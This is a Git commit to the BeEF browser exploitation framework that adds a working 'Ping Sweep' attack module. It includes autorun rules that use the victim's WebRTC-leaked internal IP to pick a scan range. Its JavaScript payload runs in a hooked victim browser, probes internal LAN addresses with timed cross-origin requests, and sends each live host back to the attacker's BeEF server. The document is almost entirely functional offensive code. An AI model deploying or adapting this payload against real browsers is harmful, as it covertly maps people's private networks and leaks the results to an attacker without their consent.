Add Ping Sweep module

2016-04-17 14:07:55 +00:00
parent 7d4d188bb5
commit 624d81749e
5 changed files with 207 additions and 0 deletions
--- a/arerules/lan_ping_sweep.json
+++ b/arerules/lan_ping_sweep.json
@@ -0,0 +1,25 @@
+{"name": "LAN Ping Sweep",
+  "author": "bcoles",
+  "browser": "FF",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_internal_ip_webrtc",
+      "condition": null,
+      "code": null,
+      "options": {}
+    },
+    {"name": "ping_sweep",
+      "condition": "status==1",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
+      "options": {
+        "rhosts":"<<mod_input>>",
+        "threads":"3"
+      }
+    }
+  ],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 0],
+  "chain_mode": "nested-forward"
+}
--- a/arerules/lan_ping_sweep_common.json
+++ b/arerules/lan_ping_sweep_common.json
@@ -0,0 +1,20 @@
+{"name": "LAN Ping Sweep (Common IPs)",
+  "author": "bcoles",
+  "browser": "FF",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "ping_sweep",
+      "condition": null,
+      "code": null,
+      "options": {
+        "rhosts":"common",
+        "threads":"3"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/modules/network/ping_sweep/command.js
+++ b/modules/network/ping_sweep/command.js
@@ -0,0 +1,108 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+  var ips = new Array();
+  var rhosts = "<%= @rhosts %>";
+  var threads = parseInt("<%= @threads %>", 10) || 3;
+  var timeout = 1000;
+
+  if(!beef.browser.hasCors()) {
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support CORS', beef.are.status_error());
+    return;
+  }
+
+  // set target IP addresses
+  if (rhosts == 'common') {
+    // use default IPs
+    ips = [
+      '192.168.0.1',
+      '192.168.0.100',
+      '192.168.0.254',
+      '192.168.1.1',
+      '192.168.1.100',
+      '192.168.1.254',
+      '10.0.0.1',
+      '10.1.1.1',
+      '192.168.2.1',
+      '192.168.2.254',
+      '192.168.100.1',
+      '192.168.100.254',
+      '192.168.123.1',
+      '192.168.123.254',
+      '192.168.10.1',
+      '192.168.10.254'
+    ];
+  } else {
+    // set target IP range
+    var range = rhosts.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+    if (range == null || range[1] == null) {
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error());
+      return;
+    }
+    ipBounds   = rhosts.split('-');
+    lowerBound = ipBounds[0].split('.')[3];
+    upperBound = ipBounds[1].split('.')[3];
+    for (var i = lowerBound; i <= upperBound; i++){
+      ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+      ips.push(ipToTest);
+    }
+  }
+
+  WorkerQueue = function(frequency) {
+
+    var stack = [];
+    var timer = null;
+    var frequency = frequency;
+    var start_scan = (new Date).getTime();
+
+    this.process = function() {
+      var item = stack.shift();
+      eval(item);
+      if (stack.length === 0) {
+        clearInterval(timer);
+        timer = null;
+        var interval = (new Date).getTime() - start_scan;
+        beef.debug("[Ping Sweep] Worker queue is complete ["+interval+" ms]");
+        return;
+      }
+    }
+
+    this.queue = function(item) {
+      stack.push(item);
+      if (timer === null) timer = setInterval(this.process, frequency);
+    }
+
+  }
+
+  // create workers
+  var workers = new Array();
+  for (w=0; w < threads; w++) workers.push(new WorkerQueue(timeout));
+
+  beef.debug("[Ping Sweep] Starting scan ("+(ips.length)+" URLs / "+threads+" workers)");
+  for (var i=0; i < ips.length; i++) {
+    var worker = workers[i % threads];
+    var ip = ips[i];
+    // use a high port likely to be closed/filtered (60000 - 65000)
+    var port = Math.floor(Math.random() * 5000) + 60000;
+    worker.queue('var start_time = new Date().getTime();' +
+      'beef.net.cors.request(' +
+        '"GET", "http://'+ip+':'+port+'/", "", '+timeout+', function(response) {' +
+          'var current_time = new Date().getTime();' +
+          'var duration = current_time - start_time;' +
+          'if (duration < '+timeout+') {' +
+            'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- host is up");' +
+            'beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip='+ip+'&ping="+duration+"ms", beef.are.status_success());' +
+          '} else {' +
+            'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- timeout");' +
+          '}' +
+      '});'
+    );
+    }
+
+});
+
--- a/modules/network/ping_sweep/config.yaml
+++ b/modules/network/ping_sweep/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        ping_sweep:
+            enable: true
+            category: "Network"
+            name: "Ping Sweep"
+            description: "Discover active hosts in the internal network of the hooked browser using JavaScript XHR.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses."
+            authors: ["bcoles"]
+            target:
+                working: ["FF"]
+                not_working: ["ALL"]
--- a/modules/network/ping_sweep/module.rb
+++ b/modules/network/ping_sweep/module.rb
@@ -0,0 +1,38 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Ping_sweep < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+
+    configuration = BeEF::Core::Configuration.instance
+    if configuration.get("beef.extension.network.enable") == true
+
+      session_id = @datastore['beefhook']
+
+      # log the network service
+      if @datastore['results'] =~ /^ip=(.+)&ping=(\d+)ms$/
+        ip = $1
+        ping = $2
+        if BeEF::Filters.is_valid_ip?(ip)
+          print_debug("Hooked browser found host #{ip}")
+          BeEF::Core::Models::NetworkHost.add(:hooked_browser_id => session_id, :ip => ip)
+        end
+      end
+    end
+
+  end
+
+  def self.options
+    return [
+        {'name' => 'rhosts', 'ui_label' => 'Scan IP range (C class)', 'value' => 'common' },
+        {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '3'}
+    ]
+  end
+
+end